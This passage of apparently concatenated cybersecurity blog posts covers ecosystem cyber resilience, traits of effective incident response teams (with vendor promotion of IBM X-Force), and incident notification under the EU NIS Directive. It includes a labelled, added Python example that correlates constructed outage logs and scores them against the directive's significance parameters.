This focus goes beyond the routine of third-party vendor assessments and the management of those particular risks to include a broader view of the risks posed to the organization by the ecosystem and vice versa: highest external risks and their impacts, reputational risks, external dependencies and procurement process agility, testing and integration of new systems, and preparedness against cascading failures originating outside the organization.

Collaborate and Test Across Your Ecosystem

With the realization that “we’re all in this together,” boards want to learn how effectively their organizations are collaborating with the rest of the ecosystem in planning and testing cyber resilience. What mechanisms are in place to share best practices and alerts (e.g., the various Information Sharing and Analysis Centers in the U.S.)? What government resources or bodies are available to interface with? How does management ensure that it is aware of relevant information that may be shared with the organization via those channels? How is information received through such channels used for strategic decisions by management?

A clear example of this commitment to collaboration across the ecosystem for the betterment of all is the Charter of Trust, which leading global companies such as Siemens, Airbus, Allianz, Daimler and IBM have signed on to as a way “to strengthen trust in the security of the digital economy.” The 10 principles outlined in the Charter of Trust are fully aligned with, and reinforce the commitment of, the management of each of those companies to creating a better, safer digital ecosystem for us all.

While collaboration and sharing of threat information and best practices is key, the entire ecosystem would be left in a highly fragile state if peers and competitors didn’t also collaborate to prepare and test their cyber resilience plans. Once again, the CISO is well-placed to be part of those discussions and exercises, to help evaluate just how well the ecosystem can respond to and recover from a cyber incident.

Top leadership and board directors are coming to grips with the need for their organizations — together with their peers and competitors in the ecosystem — to be more resilient to cyber attacks and disruptions. CISOs, who now have a seat at the table, must play a leading role in this effort.

The post Taming Global Cybersecurity Risks Requires a Concerted Cyber Resilience Effort appeared first on Security Intelligence.

5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line

How you respond to a data breach matters.

In today’s world, most companies have documented policies and technologies that can help prepare them for grappling with a cyber intruder, but in many cases those tactics are insufficient — focusing more on answering questions about the incident itself and less about an integrated response that protects reputation, the business and, most importantly, clients.

A breach can be damaging, and the inability to respond effectively can add even more self-inflicted damage. The good news is, while you can’t control whether or not you’re a target of a breach, you can control how — and how well — you respond.

Leading organizations that analyze business trends have taken note of the importance of an integrated response. Earlier this week, Forrester released “The Forrester Wave™: Cybersecurity Incident Response Services, Q1 2019.” This report encourages customers to look for providers that can ensure timely preparation and breach response. Some characteristics highlighted in the report include vendors that have cyber range capabilities to train employees in the event of an attack and provide thorough deliverables to help beyond postmortem of the incident.

Forrester evaluated 15 incident response (IR) service providers and weighed them across 11 criteria. These vendors were identified, evaluated, researched, analyzed and scored. The Forrester Wave report shows how each provider measures up and helps security and risk professionals make the right choice. Forrester noted that IBM “is a strong choice for training and incident preparation services” and that it “attaches X-Force threat intelligence analysts to its IR teams to ensure full situational awareness across the investigation.”

The IBM X-Force Incident Response and Intelligence Services (IRIS) team was created in 2016 and launched alongside the X-Force Command Cyber Range in Cambridge, Massachusetts. We knew that pairing a strong IR team with an immersive range experience that tests skills to survive the inevitable would greatly increase the success our clients experience in the event of a breach.

5 Characteristics of an Elite IR Team

As leaders of the X-Force IRIS team, we’ve been on the front line of hundreds of security breaches and built a team of elite practitioners that help clients recover quickly and effectively in the wake of an attack. Here are the top five characteristics of a world-class response team, based on our experience.

1. It Starts With People

One of the things we often say is, “IR is a team sport.” And with any team, it’s important to make sure each player has a unique set of skills that, when combined with the rest, compose a formidable force against your opponent.

The right team with the right skills means you solve problems faster, build more creative solutions to challenges, and have diverse insight and perspective on situations that allows you to view the problem from a variety of angles. That’s important, because often the attackers have assembled teams of skilled individuals that represent different experiences and perspectives themselves, so constructing an internal team in a similar manner enables you to quickly identify tactics and anticipate the next move.

2. Great Technology, Dynamic Analysis

When you’re technology agnostic, you can go beyond the tools available in your backyard and better ensure you’re getting the right capabilities to achieve your objective. We’ve learned that when we’re not tied to a specific technology or limited to one analytical methodology, we can rapidly evolve our approach to swiftly detect an attacker’s ever-shifting activity.

3. Embedded Threat Intelligence Capabilities

For every case we open, we embed an intelligence analyst who stays involved from start to finish. They bring a consistent intel perspective to each case, augmenting their own skills by leveraging unique insights from the larger intelligence team. Their combined insight gives us exceptional views into an adversary’s actions, tools and methodologies. Understanding these aspects allows faster, more accurate mitigation actions.

4. Comprehensive Remediation

There are two important focus areas for remediation: tactical and strategic. The tactical emphasizes removing an attacker and their access from the victim environment, and the strategic centers on ensuring that same type of attack is not successful again. They both matter, because getting an intruder out quickly and making sure you’re not vulnerable to the same kind of exploitation keeps you safer.

But there’s an element that goes beyond the tactical and the strategic: rebuilding an environment that’s been destroyed as the result of an attack. Rebuilding an environment requires a set of precision skills and, often, a great deal of human resources to ensure it’s done quickly, accurately, and in a way that enables you to continue to operate while rebuilding and recovery take place.

We built the X-Force IRIS team with a set of practitioners that, together, represent thousands of hours of experience rebuilding devastated environments from the ground up. That means when a client has been ravaged by an attack, it can rely on us to not only help it remediate, but keep its business running while we rebuild anew.

5. Train Like You Fight, Fight Like You Train

Even the best IR plan is insufficient if you don’t practice it. We encourage clients to run battle drills on their IR plans (and even put our own to the test). While tabletop exercises can be informative, by far the best way to train for a cyber breach is through an immersive, instructor-led range experience.

We combine our IR expertise with the X-Force Command Cyber Range. Here, we immerse clients in a highly gamified scenario that tests not only their IR plan, but also their human abilities to respond and adapt in a crisis. This helps uncover gaps in existing processes and silos in an organization and develop ways to respond to a breach in an integrated fashion that can’t be replicated in any other way.

Competitive Collaboration

Leaders named in the Forrester Wave™ — such as FireEye, CrowdStrike and Deloitte — are proving that effective incident response is worth the investment. And as competitors, we have the opportunity to share information and create a more robust collective defense for our clients when possible. We are enthusiastic about opportunities like this that allow us to share and build knowledge, because when cybersecurity is implemented correctly, it enables transformation and business growth regardless of the competitive landscape.

The X-Force IRIS team’s investigative and analytical methodology will continue to adapt to meet future IR challenges. By combining cutting-edge methodology with new technologies across disjointed security layers, we envision that our clients will get the context they need to eliminate the noise and identify the most critical threats so they can get back to what matters most: their core business.


The post 5 Characteristics of an Effective Incident Response Team: Lessons From the Front Line appeared first on Security Intelligence.

Breaking Down the Incident Notification Requirements in the EU’s NIS Directive

Our society relies on the availability, security and reliability of network and information systems (NIS). Various security frameworks provide standards and guidance as to which measures organizations should implement to protect IT systems and increase resilience. However, since such recommendations are not ingrained as actual laws in most countries, these best practices and guidelines are often followed solely on a voluntary basis.

This contrasts with the European Union (EU)’s NIS Directive, legislation that sets a range of network and information security requirements to augment IT security across all EU member states. While the directive covers a few different domains, including preparedness, cross-EU collaboration and incident response (IR), one of its main pillars focuses on breach notification requirements.

In this post, we will focus specifically on the aspects of incident notification contained in the NIS Directive as they apply to operators of essential services (OES).

Regulations Versus Directives

The NIS Directive is a different type of legal act compared to, say, the General Data Protection Regulation (GDPR). The latter is immediately applicable and enforceable by law in all member states. A directive is somewhat different.

While it also applies to all member states, instead of being immediately applicable, it sets goals, requirements and results that must be achieved. It is then up to each member state to devise its own laws on how to reach these goals and what types of penalties noncompliance will carry. The NIS Directive also sets a floor. There can be greater requirements applicable based on the organization’s industry sector and member state(s) it operates in.

This legal status reveals one of the possible issues with a directive: Whereas a regulation is direct law, a directive needs to be transposed into local laws by each member state. These transpositions can result in differences in the implementation of the directive into law, in some cases complicating matters for organizations that operate across borders.

Variance in Incident Notification Definitions

One of the articles in the NIS Directive that has received a lot of attention is Article 14, which outlines requirements for security and incident notification. It stipulates that member states must ensure that OES notify the national competent authority and the national computer security incident response team (CSIRT) in case of an incident that significantly impacts the continuity of an essential service. This is not entirely new — depending on the type of activity or sector, there are already requirements for incident reporting in Europe, including Article 13a of the Telecom Framework Directive.

An additional element of complexity is that, according to Article 5, the identification of OES per sector needs to happen individually within each member state. Although organizations might give input to this process, the actual identification is out of their hands. This process is another way by which the directive could result in various interpretations that end up adding complexity.

The Benefits of Incident Notification

One of the drivers for notification in the context of the directive is to be compliant with legal requirements. However, if the starting point of your organization is to only comply with the bare minimum of these notification requirements, then you will miss out on the opportunities provided by the directive.

Additionally, the bulk of these requirements, including notification and detection capabilities, should already be covered in large part by your existing security environment. If this is not the case, you can use the NIS Directive as a wake-up call to improve your security posture.

From a policymaker’s point of view, the notification requirements can help better identify the challenges within a sector and propose mitigation measures that are based on actual facts and figures. These facts and figures can then be used by CSIRTs (or a responsible authority) to provide more relevant warnings and situation reports together with sector-specific threat intelligence. Similarly, this information can also be used to evaluate cross-border impact of incidents or threats and optionally notify other member states.

Breaking Down Notification Requirements

Now, let’s dive into some details of the NIS Directive. There are essentially three main parts to the notification requirement.

First, prior to notification, organizations need to be able to detect security incidents — i.e., they must possess appropriate detection capabilities. The second part involves defining what a significant incident is and what risks, either directly or indirectly, can have significant impact on an essential service. The last part of the notification requirement involves understanding when, what, how and to whom organizations must report incidents.

First Things First — Detection

Every notification starts with proper detection of an incident. You can find guidelines on detection capabilities in a reference publication from the NIS Cooperation Group on security measures.

The core principles for these security measures include being effective, tailored, compatible, proportionate, concrete, verifiable (evidence of the effective implementation of security policies) and inclusive (includes all security domains that may contribute to reinforcing cybersecurity).

Applying NIS measures to the domain of detection and resilience can be done by:

  • Setting up a detection system to analyze files and protocols — this can include, for example, network intrusion detection systems (NIDSs) or malware sandboxes;
  • Enabling logging on critical systems (log entries should include time stamps);
  • Collecting the logs centrally; and
  • Conducting log correlation and analysis on the events coming from critical systems.

All of the above actions can also be automated with a security information and event management (SIEM) solution.

After Detection — Defining Incidents

But what, exactly, is a security incident? Article 4 defines it as any event that has an actual “adverse effect” on the security of network and information systems. As a side note, the directive does not include a definition of what is covered by “adverse.”

Based on the information from the NIS Cooperation Group, we can combine the definition of an incident with the definition of security of network and information systems. This would redefine an incident to be any event that affects the authenticity, confidentiality, integrity or availability of network and information systems, and has a significant impact on the continuity of the essential service itself.

What Is a Significant Incident?

A set of three parameters from Article 14 of the NIS Directive can be used to determine what is considered a significant incident:

  • The number of users that are affected by the disruption of the essential service.
  • The duration of the incident.
  • The geographic spread of those affected by the incident.

Additionally, the parameters from Article 6 are also helpful in defining what qualifies as a significant incident:

  • What is the dependency of other OES on the service affected by the incident?
  • What is the impact (degree, duration) on economic and social activities or on public safety? In particular, the impact on social activities can be hard to measure for OES.
  • How large is the market share of the affected service?
  • What is the geographic spread that could be affected?
  • How important is the affected element for maintaining a sufficient level of service?

In general, most of these parameters are ones that OES already use to define crises in their services that are unrelated to IT.

The actual criteria, thresholds and parameters for determining significant incidents are defined by member states. These can include the parameters defined in the NIS Directive, possibly extended by the member state or with sector-specific criteria.
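The detection steps listed earlier (time-stamped logs from critical systems, collected centrally and correlated) and the three Article 14 parameters can be joined into one small correlation rule: fold per-host availability events into a single incident, then measure users affected, duration and geographic spread against local thresholds. The block below is an added example, not code from the original post or from any NIS Cooperation Group publication; the log format, the asset inventory, the thresholds and the “any parameter over its threshold” rule are constructed assumptions, since the real thresholds are set by each member state and sector.

```python
# Added example: correlate availability logs into an incident and score it on
# the NIS Directive's Article 14 parameters. All data and thresholds are constructed.
import re
from collections import namedtuple
from dataclasses import dataclass, field
from datetime import datetime, timedelta
from typing import Optional

# Constructed asset inventory (assumption): host -> (end users served, region).
ASSETS = {
    "gw-north-01": (40_000, "north"),
    "gw-north-02": (35_000, "north"),
    "gw-south-01": (50_000, "south"),
    "hmi-ops-01": (0, "north"),  # operator console, serves no end users
}

# Constructed placeholder thresholds; a member state or sector defines the real ones.
THRESHOLDS = {"users": 100_000, "duration": timedelta(hours=2), "regions": 2}

# Constructed sample log lines, as they would arrive at a central collector.
SAMPLE_LOGS = """\
2019-03-02T08:58:10Z gw-north-01 availmon svc=dispatch status=up
2019-03-02T09:00:00Z gw-north-01 availmon svc=dispatch status=down
2019-03-02T09:00:05Z gw-north-02 availmon svc=dispatch status=down
2019-03-02T09:02:30Z hmi-ops-01 auth user=operator result=ok
2019-03-02T09:03:00Z gw-south-01 availmon svc=dispatch status=down
2019-03-02T11:10:00Z gw-north-01 availmon svc=dispatch status=up
2019-03-02T11:12:00Z gw-north-02 availmon svc=dispatch status=up
2019-03-02T12:15:00Z gw-south-01 availmon svc=dispatch status=up
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (.*)$")
Event = namedtuple("Event", "ts host source fields")

@dataclass
class Incident:
    service: str
    start: datetime          # first host reported down
    end: Optional[datetime]  # last host back up; None while still ongoing
    hosts: set = field(default_factory=set)  # every host hit during the incident
    down: set = field(default_factory=set)   # hosts still down right now

    def duration(self, now: Optional[datetime] = None) -> Optional[timedelta]:
        stop = self.end or now
        return stop - self.start if stop else None

def parse_logs(text: str) -> list:
    """Parse 'TIMESTAMP HOST SOURCE key=value ...' lines; skip malformed ones."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ts, host, source, rest = m.groups()
        try:
            when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        except ValueError:
            continue  # entries without a usable time stamp cannot be correlated
        fields = dict(kv.split("=", 1) for kv in rest.split() if "=" in kv)
        events.append(Event(when, host, source, fields))
    return events

def correlate_outages(events: list) -> list:
    """Fold per-host status changes into one incident per affected service."""
    incidents = {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.source != "availmon":
            continue
        svc, status = ev.fields.get("svc"), ev.fields.get("status")
        if status == "down":
            inc = incidents.setdefault(svc, Incident(svc, ev.ts, None))
            inc.hosts.add(ev.host)
            inc.down.add(ev.host)
            inc.end = None  # a new outage reopens a recovering incident
        elif status == "up" and svc in incidents:
            inc = incidents[svc]
            inc.down.discard(ev.host)
            if not inc.down:
                inc.end = ev.ts  # closed only once every host is back up
    return list(incidents.values())

def assess_significance(inc: Incident, now: Optional[datetime] = None,
                        assets: dict = ASSETS, thresholds: dict = THRESHOLDS) -> dict:
    """Score an incident on users, duration and spread; any parameter at or over
    its threshold marks it significant (an assumption, not the directive's rule)."""
    users = sum(assets[h][0] for h in inc.hosts if h in assets)
    regions = sorted({assets[h][1] for h in inc.hosts if h in assets})
    duration = inc.duration(now)  # None when ongoing and no 'now' is supplied
    measured = {"users": users, "duration": duration, "regions": len(regions)}
    exceeded = [k for k, v in measured.items()
                if v is not None and v >= thresholds[k]]
    return {"service": inc.service, "users": users, "regions": regions,
            "duration": duration, "exceeded": exceeded,
            "significant": bool(exceeded), "ongoing": inc.end is None}

if __name__ == "__main__":
    for inc in correlate_outages(parse_logs(SAMPLE_LOGS)):
        print(assess_significance(inc))
```

An incident whose `ongoing` flag is set is exactly the case where the directive expects a preliminary notification before all details are known; the final report follows once `end` is set.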

The Directive’s Notification Timeline

According to Article 14, organizations need to notify without undue delay, although this timeline can be shortened or specified based on the member state. The term “undue” can also be subjective, but in most cases, this means the organization must send a preliminary notification whenever an incident is first detected, even if all the details are not available yet. The goal is to raise awareness. As your investigation progresses, you can provide intermediate follow-ups, and when the incident is closed, you can provide a full report.

It’s fairly simple to implement this step. Your IR plan should already include a notification and escalation path for certain types of critical incidents during the detection and analysis phases. It should also foresee a final incident report as part of the lessons-learned phase.

In essence, this requirement is an extension of an already established IR plan and recovery process.

Where to Report?

Each member state is free to choose its own reporting framework. This can be the national authority, sectorial authorities or a combination of both in addition to notifying the national CSIRTs.

As an organization, it is important to identify to whom you have to report, exchange contact details between your security team and the notification body, and establish and test this communication process.

Use the NIS Directive as an Opportunity

Similar to the GDPR, you can approach this directive as a roadblock or a nuisance, or you can consider it an excellent opportunity to improve your security posture. The fact that some security requirements are legal requirements can help you further establish your security program.

There are many articles in the directive to take into account, but you should start by focusing on the following:

  • Article 4, which defines a security incident;
  • Article 5, which mandates that member states should identify OES;
  • Article 6, which sets additional parameters to define significant incidents; and
  • Article 14, which requires you to implement security measures and notification processes. This article also contains the three base parameters to define what is a significant incident and describes the accepted delay for notifications.

Unfortunately, despite the fact that the bulk of the NIS Directive has been well-known for quite some time, not all EU member states have finalized the phase of transposing the recommendations into actual laws.

If this is the case for your environment, you might benefit from the situation and provide your lawmakers with input for security measures that would actually improve the level of security for network and information systems in your sector.

The post Breaking Down the Incident Notification Requirements in the EU’s NIS Directive appeared first on Security Intelligence.